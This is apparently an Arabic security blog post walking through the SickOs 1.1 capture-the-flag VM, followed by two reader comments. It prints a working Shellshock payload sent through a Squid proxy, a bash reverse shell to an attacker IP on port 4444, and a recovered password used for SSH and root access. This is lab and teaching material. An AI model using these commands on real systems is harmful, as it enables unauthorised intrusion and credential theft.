مقال : حل تحدي sickos 1.1 من تحديات الـCTF

تقيمك :

كتبه: isecur1ty
أدوات وبرامج, المقال المثبت, مواضيع عامة, مواضيع ومقالات
22 ديسمبر 16
4 تعليقات

اليوم سنقوم بأذن الله بحل تحدي أخر من تحديات الـCTF

أولا قم بتحميل ملف الـVM من هنا

أول شئ نستخدم netdiscover لمعرفه الجهاز الهدف

netdiscover -i eth0 -r 192.168.79.0/24

1	netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.178 هو الهدف

الأن نستخدم أداه nmap لمعرفه المنافذ المفتوحه

nmap -sV -v -O -A -T5 192.168.79.178 -p-

1	nmap -sV -v -O -A -T5 192.168.79.178 -p-

يتضح أنه كلا من المنفذ 22 والمنفذ 3218 مفتوح والمنفذ 3218 عليه الخدمه Squid.

وعند فتح مشروع الـMetasploit والبحث عن كلمه Squid وجدت الأتي :

لذلك سنستخدم هذا الموديول الأن في عمل فحص للخدمه

يتضح أن المنفذ 80 مفتوح

ولذلك سنقوم الأن بأستخدام أضافه FoxyProxy الخاصه بالفيرفوكس لأستخدام الجهاز من البورت 3128 كا بروكسي

والأن نقوم بفتح العنوان http://192.168.79.178

والأن سنقوم بأستخدام أداه nikto لفحص الجهاز

nikto -h localhost -useproxy http://192.168.79.178:3128

1	nikto -h localhost -useproxy http://192.168.79.178:3128

يتضح أنه مصاب بثغره shellshock ! فلنقم بأختباره

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

1	wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

أنها تعمل ومن الواضح أيضا أنه يوجد حساب بأسم sickos

والأن لنجهز شيل عكسي

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1
nc -nlvp 4444

1 2	/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1 nc -nlvp 4444

وفي نافذه أخري

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

1	wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

ونحصل علي الشيل

وبعد الدخول علي الجهاز وجدنا ملف مثير للأهتمام var/www/wolfcms/config.php

كما هو واضح كلمه السر هي john@123

والأن ندخل الجهاز من خلال خدمه SSH بأسم المستخدم sickos وكلمه السر john@123

والأن لنتأكد من صلاحياتنا

sudo -l

sudo -l

يتضح أنه بصلاحيات Root

المقاله مترجمه من المقاله الأصليه

isecur1ty

مجتمع عربي للهاكر الأخلاقي وخبراء الحماية يركّز على مفهوم اختبار الاختراق وجديد أخبار الحماية

التعليقات

4 تعليقات في “مقال : حل تحدي sickos 1.1 من تحديات الـCTF”

hhh

26 ديسمبر، 2016 الساعة 9:12 ص

اساليب بدائية بالاختراق كل المواقع والاجهزة مقفلة البورتات وعليها جدار حماية يعني فلتر على البورتات
امكن 1 بالمئة بتنجح معهم
مادري متى نرتقي بالمحتوى كلها اساليب غير واقعية
ممكن تشرح لنئ كيف نتخطئ الجدار الناري وكيف اذا البورتات مفلترة
وعلى نظام ويندس 10 او حتى 7
اتحدا الطريقة تنجح

رد

علي الوشلي

2 مارس، 2017 الساعة 1:47 م

هذه التحديات الهدف منها ان يكون هناك مقالات تعليميه ولكن بطريقه مختلفه , بدل من اشرح اداه سوف احاول ان اجد تحدي فيه استخدام للاداه بحيث سوف يكون هناك سيناريو كامل,, وفي العاده التحديات يتم تصنيفها على حسب الصعوبه من بسيط , متوسط ومتقدم

حاول ان تنزل بشكل عشوائي احد الاجهزه وقم باختباره سوف تلاحظ ان هناك بعض الوقت يجب ان تستغرقه في التفكير والتوصل للاستغلال
المشكله الكل يقرا الحل قبل المحاوله

رد